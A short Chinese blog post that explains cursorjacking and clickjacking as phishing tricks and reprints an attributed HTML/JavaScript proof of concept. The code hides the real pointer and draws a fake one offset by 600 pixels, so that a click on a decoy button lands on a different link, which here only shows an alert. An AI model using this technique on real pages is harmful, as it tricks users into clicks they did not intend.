cursorjacking与clickjacking一样都是萎缩的phishing手段，clickjacking（点击劫持）当你单击A链接实际上打开的是B链接。cursorjacking（鼠标指针劫持）当你将鼠标放置在页面中的A对象上时，实际上鼠标是位于B对象上。下面是老外给的poc有兴趣的童鞋可以在firefox和Chrome下测试一下。你可以认为XSS不是技术活，但你的承认XSS用好了绝对是艺术活。
 

<body style="cursor:none;height: 1000px;"> 
<img style="position: absolute;z-index:1000;" id=cursor src="cursor.png" /> 
<button id=fake style="font-size: 150%;position:absolute;top:100px;left:630px;">click me click me</button> 
<div style="position:absolute;top:100px;left:30px;"> 
<a href="#" onclick="alert(/you clicked-me-instead/)">i'm not important</a> 
</div> 
<script> 
  var  oNode = document.getElementById('cursor'); 
  
  var onmove = function (e) {   
    var nMoveX =  e.clientX, nMoveY =  e.clientY;  
    oNode.style.left = (nMoveX + 600)+"px";   
    oNode.style.top = nMoveY + "px";   
  };  
  document.body.addEventListener('mousemove', onmove, true); 
</script> 
</body>

 poc：http://blog.kotowicz.net/2012/01/cursorjacking-again.html